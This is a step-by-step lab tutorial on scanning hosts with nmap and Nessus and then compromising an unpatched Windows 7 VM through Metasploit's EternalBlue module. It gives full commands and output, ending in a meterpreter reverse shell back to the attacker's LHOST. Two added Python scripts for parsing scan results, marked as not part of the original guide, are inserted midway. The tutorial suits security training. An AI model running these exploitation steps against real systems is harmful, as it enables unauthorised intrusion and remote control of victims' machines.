
Step-by-step guide to vulnerability scanning with Nessus and exploitation with Metasploit on Kali Linux

1. Download Nessus from Kali Linux at https://www.tenable.com/products/nessus/select-your-operating-system#tos

2. Open a shell and type:

root@KALI-LINUX-2017:~# cd Descargas

root@KALI-LINUX-2017:~/Descargas# ls -- lists the files in the Descargas directory

Nessus-6.10.8-debian6_amd64.deb -- this is the Nessus installer package

root@KALI-LINUX-2017:~/Descargas# dpkg -i Nessus-6.10.8-debian6_amd64.deb -- installs Nessus

Seleccionando el paquete nessus previamente no seleccionado.

(Leyendo la base de datos ... 318920 ficheros o directorios instalados actualmente.)

Preparando para desempaquetar Nessus-6.10.8-debian6_amd64.deb ...

Desempaquetando nessus (6.10.8) ...

Configurando nessus (6.10.8) ...

Unpacking Nessus Core Components...

nessusd (Nessus) 6.10.8 [build M20096] for Linux

Copyright (C) 1998 - 2016 Tenable Network Security, Inc

Processing the Nessus plugins...

[##################################################]

All plugins loaded (1sec)

- You can start Nessus by typing /etc/init.d/nessusd start

- Then go to https://KALI-LINUX-2017:8834/ to configure your scanner

Procesando disparadores para systemd (233-9) ...

root@KALI-LINUX-2017:~/Descargas# /etc/init.d/nessusd start -- starts Nessus

Starting Nessus : .

root@KALI-LINUX-2017:~/Descargas#

3. Right-click the link https://KALI-LINUX-2017:8834/

4. Click Advanced


5. Add a security exception

6. The following screen appears; click Continue.

7. The next window asks us to create a username and password to administer Nessus. Click Continue.

8. The next screen asks for an activation code; to get one, click Registering this scanner. It asks for an e-mail
address to which the activation code is sent.

9. Click Register Now and complete the registration. Check the mailbox and copy the activation code.

10. Go back to the Registration page, enter the code received by e-mail and click Continue.

11. The following screen appears; the installation takes a few minutes to finish.

12. The next screen asks us to log in with the username and password created earlier.

13. We are now on the home screen.

14. From the shell, scan the network to discover the hosts:

root@KALI-LINUX-2017:~# nmap -sn 192.168.24.0/24

15. Now try to identify the operating systems and services:

nmap -sV -A -Pn 192.168.24.0/24

16. In Nessus, run as many vulnerability scans as hosts were discovered.

Click New Scan


17. Click Advanced Scan

18. Fill in the fields with a name for the vulnerability scan and the target IP. Open the drop-down next to Save and choose the
Launch option. In this case I chose an unpatched Windows 7 Professional machine.

19. The vulnerability scan starts.

20. The vulnerability scan finishes.


21. Click WIN7 to display the result.

22. Click Vulnerabilities to see even more detail on the result. Note the second critical vulnerability, MS17-010,
better known as ETERNALBLUE. ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE and ETERNALSYNERGY are four of the
many vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt
is a ransomware program that uses the ETERNALBLUE exploit, and EternalRocks is a worm that WannaCry uses to spread.
Petya is a ransomware program that uses CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via
ETERNALBLUE.

Clicking any of the vulnerabilities gives more details about it.


23. Now export the results in .nessus format so they can be used with Metasploit. Open the Export drop-down and choose Nessus.

24. By default the file is saved in Descargas. To make things easier, move the file to the home folder (Carpeta Personal).

25. Initialise Metasploit:

root@KALI-LINUX-2017:~# service postgresql start

root@KALI-LINUX-2017:~# msfconsole -q

msf > msfdb init

[*] exec: msfdb init

Creating database user 'msf'

Ingrese la contraseña para el nuevo rol:

Ingrésela nuevamente:

Creating databases 'msf' and 'msf_test'

Creating configuration file in /usr/share/metasploit-framework/config/database.yml

Creating initial database schema

26. Create a workspace for the Windows 7 host:

msf > workspace -a WIN7

[*] Added workspace: WIN7


27. Import the vulnerabilities found by Nessus into the WIN7 workspace. First list the directories and files:

msf > ls
[*] exec: ls
Descargas
Documentos
Escritorio
Imágenes
Música
Plantillas
Público
Vídeos
WIN7_b25wpl.nessus -- here is the .nessus file

Now use the following command to import the file generated by Nessus:

msf > db_import WIN7_b25wpl.nessus

[*] Importing 'Nessus XML (v2)' data

[*] Importing host 192.168.24.137

[*] Successfully imported /root/WIN7_b25wpl.nessus
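As an added example that is not part of the original guide, the following Python script parses a .nessus (v2) export of the kind just imported (the same XML format db_import reads) and pulls out the findings a defender would patch first. The XML sample is constructed here to mirror the guide's findings; the element names (ReportHost, ReportItem, cve, msft, solution) follow the .nessus v2 layout as I understand it and are an assumption, not taken from the page.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the .nessus (v2) XML layout (assumed element names); the
# values mirror the findings the guide's scan reported for the Windows 7 host.
SAMPLE_NESSUS = """<NessusClientData_v2>
  <Report name="WIN7">
    <ReportHost name="192.168.24.137">
      <HostProperties>
        <tag name="operating-system">Windows 7 Professional</tag>
      </HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
                  pluginID="97833"
                  pluginName="MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (uncredentialed check)">
        <cve>CVE-2017-0143</cve>
        <cve>CVE-2017-0144</cve>
        <msft>MS17-010</msft>
        <solution>Apply the MS17-010 security update (constructed text).</solution>
      </ReportItem>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2"
                  pluginID="57608" pluginName="SMB Signing Disabled">
        <solution>Enforce SMB message signing (constructed text).</solution>
      </ReportItem>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="19506" pluginName="Nessus Scan Information"/>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

SEVERITY = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}


def parse_nessus(xml_text):
    """Return one dict per ReportItem: host, port, plugin, severity, CVEs, MS bulletins, solution."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        addr = host.get("name")
        for item in host.iter("ReportItem"):
            findings.append({
                "host": addr,
                "port": int(item.get("port", "0")),
                "plugin_id": item.get("pluginID"),
                "name": item.get("pluginName"),
                "severity": int(item.get("severity", "0")),
                "cves": [c.text for c in item.findall("cve")],
                "msft": [m.text for m in item.findall("msft")],
                "solution": (item.findtext("solution") or "").strip(),
            })
    return findings


def patch_priorities(findings, min_severity=3):
    """High/Critical findings that carry a Microsoft bulletin, worst first: the patch list."""
    ranked = [f for f in findings if f["severity"] >= min_severity and f["msft"]]
    return sorted(ranked, key=lambda f: (-f["severity"], f["host"], f["name"]))


if __name__ == "__main__":
    for f in patch_priorities(parse_nessus(SAMPLE_NESSUS)):
        print(f"{SEVERITY[f['severity']]:8} {f['host']}:{f['port']} "
              f"{', '.join(f['msft'])}  {f['name']}")
        print(f"         fix: {f['solution']}")
```

Run it against a real export by replacing SAMPLE_NESSUS with the file contents; the severity threshold is a parameter so the same function can also list Medium findings such as the SMB signing one when a hardening pass is planned.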

28. The vulns command now lists the vulnerabilities discovered by Nessus.

msf > vulns


[*] Time: 2017-07-02 21:11:00 UTC Vuln: host=192.168.24.137 name=HyperText Transfer Protocol (HTTP) Information refs=NSS-24260
[*] Time: 2017-07-02 21:11:00 UTC Vuln: host=192.168.24.137 name=HTTP Server Type and Version refs=NSS-10107
[*] Time: 2017-07-02 21:11:00 UTC Vuln: host=192.168.24.137 name=Web Server No 404 Error Code Check refs=NSS-10386
[*] Time: 2017-07-02 21:11:00 UTC Vuln: host=192.168.24.137 name=Service Detection refs=NSS-22964
[*] Time: 2017-07-02 21:11:00 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=MS11-030: Vulnerability in DNS Resolution Could Allow Remote Code
Execution (2509553) (remote check) refs=CVE-2011-0657, BID-47242, OSVDB-71780, IAVA-2011-A-0039, MSFT-MS11-030, MSF-Microsoft
Windows DNSAPI.dll LLMNR Buffer Underrun DoS, NSS-53514
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Link-Local Multicast Name Resolution (LLMNR) Detection refs=NSS-
53513
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=MS16-047: Security Update for SAM and LSAD Remote Protocols
(3148527) (Badlock) (uncredentialed check) refs=CVE-2016-0128, BID-86002, OSVDB-136339, MSFT-MS16-047, CERT-813296, IAVA-2016-A-
0093, NSS-90510
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=MS17-010: Security Update for Microsoft Windows SMB Server
(4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)
(uncredentialed check) refs=CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,CVE-2017-0148,BID-96703,BID-
96704,BID-96705,BID-96706,BID-96707,BID-96709,OSVDB-153673,OSVDB-153674,OSVDB-153675,OSVDB-153676,OSVDB-153677,OSVDB-
153678,OSVDB-155620,OSVDB-155634,OSVDB-155635,EDB-ID-41891,EDB-ID-41987,MSFT-MS17-010,IAVA-2017-A-0065,MSF-MS17-010
EternalBlue SMB Remote Windows Kernel Pool Corruption,NSS-97833
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=SMB Signing Disabled refs=NSS-57608
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Server Message Block (SMB) Protocol Version 1 Enabled
(uncredentialed check) refs=OSVDB-151058, NSS-96982
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB Versions Supported (remote check) refs=NSS-
100871
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB Registry: Nessus Cannot Access the Windows
Registry refs=NSS-26917
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB Log In Possible refs=NSS-10394
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB NativeLanManager Remote System
Information Disclosure refs=NSS-10785
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB Service Detection refs=NSS-11011
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB Service Detection refs=NSS-11011
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Windows NetBIOS / SMB Remote Host Information Disclosure
refs=NSS-10150
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Traceroute Information refs=NSS-10287
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Nessus Scan Information refs=NSS-19506
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Common Platform Enumeration (CPE) refs=NSS-45590
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Device Type refs=NSS-54615
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=OS Identification refs=NSS-11936
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=VMware Virtual Machine Detection refs=NSS-20094
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Ethernet Card Manufacturer Detection refs=NSS-35716
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=TCP/IP Timestamps Supported refs=NSS-25220
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Nessus Windows Scan Not Performed with Admin Privileges refs=NSS-
24786
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=ICMP Timestamp Request Remote Date Disclosure refs=CVE-1999-
0524, OSVDB-94, CWE-200, NSS-10114
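The vulns listing above is long and repeats plugins such as "Nessus SYN scanner" once per port, and the PDF extraction has wrapped several entries across lines. As an added example that is not part of the original guide, this Python script re-joins wrapped entries, parses each one into host, name and references, de-duplicates repeated plugins, and reduces the list to the Microsoft bulletins a defender has to apply per host. The sample lines are constructed to match the format shown above.

```python
import re

# Constructed sample modelled on the `vulns` output above. Two entries are wrapped
# onto a second line the way the PDF extraction did it (the continuation line has
# no "[*]" prefix, and one reference is even split at a hyphen: "CVE-1999-" / "0524").
SAMPLE_VULNS = """\
[*] Time: 2017-07-02 21:11:00 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=MS17-010: Security Update for Microsoft Windows SMB Server
(4013389) (uncredentialed check) refs=CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,MSFT-MS17-010,NSS-97833
[*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=SMB Signing Disabled refs=NSS-57608
[*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=ICMP Timestamp Request Remote Date Disclosure refs=CVE-1999-
0524, OSVDB-94, CWE-200, NSS-10114
"""

ENTRY = re.compile(
    r"^\[\*\] Time: (?P<time>.+? UTC) Vuln: host=(?P<host>\S+) name=(?P<name>.+?) refs=(?P<refs>.*)$"
)


def unwrap(text):
    """Join lines that do not start with '[*]' onto the previous entry (undo line wrapping)."""
    entries = []
    for line in text.splitlines():
        if line.startswith("[*]"):
            entries.append(line)
        elif entries:
            # A reference split at a hyphen must be re-joined without a space.
            sep = "" if entries[-1].endswith("-") else " "
            entries[-1] += sep + line
    return entries


def parse_vulns(text):
    """One dict per distinct (host, plugin name) with its references, CVEs and MS bulletins."""
    seen = set()
    findings = []
    for entry in unwrap(text):
        m = ENTRY.match(entry)
        if not m:
            continue
        refs = [r.strip() for r in m["refs"].split(",") if r.strip()]
        key = (m["host"], m["name"])
        if key in seen:  # the same plugin reported on several ports counts once
            continue
        seen.add(key)
        findings.append({
            "host": m["host"],
            "name": m["name"],
            "refs": refs,
            "cves": [r for r in refs if r.startswith("CVE-")],
            "msft": [r[len("MSFT-"):] for r in refs if r.startswith("MSFT-")],
        })
    return findings


def bulletins_to_apply(findings):
    """Microsoft bulletins referenced by any finding, grouped per host: the patch list."""
    per_host = {}
    for f in findings:
        for bulletin in f["msft"]:
            per_host.setdefault(f["host"], set()).add(bulletin)
    return {host: sorted(bulletins) for host, bulletins in per_host.items()}


if __name__ == "__main__":
    parsed = parse_vulns(SAMPLE_VULNS)
    for f in parsed:
        print(f"{f['host']}  {f['name']}  CVEs={len(f['cves'])}  MSFT={f['msft']}")
    print(bulletins_to_apply(parsed))
```

Feeding it the full listing from step 28 (copied into SAMPLE_VULNS, or read from a file) collapses the thirty-odd lines into a handful of distinct findings and a per-host list of bulletins, which is what a remediation ticket needs rather than the raw plugin noise.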
29. In entry no. 20 we can see the ETERNALBLUE vulnerability. Search for the exploit in the Metasploit database:
msf > search ETERNAL

Matching Modules

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

30. Use the exploit that was found:


msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description


---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.

Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
31. Now set the RHOST parameter, which is required to carry out the attack.
msf exploit(ms17_010_eternalblue) > set RHOST 192.168.24.137
RHOST => 192.168.24.137
32. We will use the payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp


payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description


---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.24.137 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description


---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
33. Now set the LHOST parameter, which is required for the payload to load.

msf exploit(ms17_010_eternalblue) > set LHOST 192.168.24.139


LHOST => 192.168.24.139
34. Launch the exploit.
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.24.139:4444


[*] 192.168.24.137:445 - Connecting to target for exploitation.
[+] 192.168.24.137:445 - Connection established for exploitation.
[+] 192.168.24.137:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.24.137:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.24.137:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.24.137:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 30 sional 7600
[+] 192.168.24.137:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.24.137:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.24.137:445 - Sending all but last fragment of exploit packet
[*] 192.168.24.137:445 - Starting non-paged pool grooming
[+] 192.168.24.137:445 - Sending SMBv2 buffers
[+] 192.168.24.137:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.24.137:445 - Sending final SMBv2 buffers.
[*] 192.168.24.137:445 - Sending last fragment of exploit packet!
[*] 192.168.24.137:445 - Receiving response from exploit packet
[+] 192.168.24.137:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.24.137:445 - Sending egg to corrupted connection.
[*] 192.168.24.137:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.24.137
[*] Meterpreter session 1 opened (192.168.24.139:4444 -> 192.168.24.137:1243) at 2017-07-02 23:31:58 +0200
[+] 192.168.24.137:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.24.137:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.24.137:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > --- WE HAVE A METERPRETER SESSION
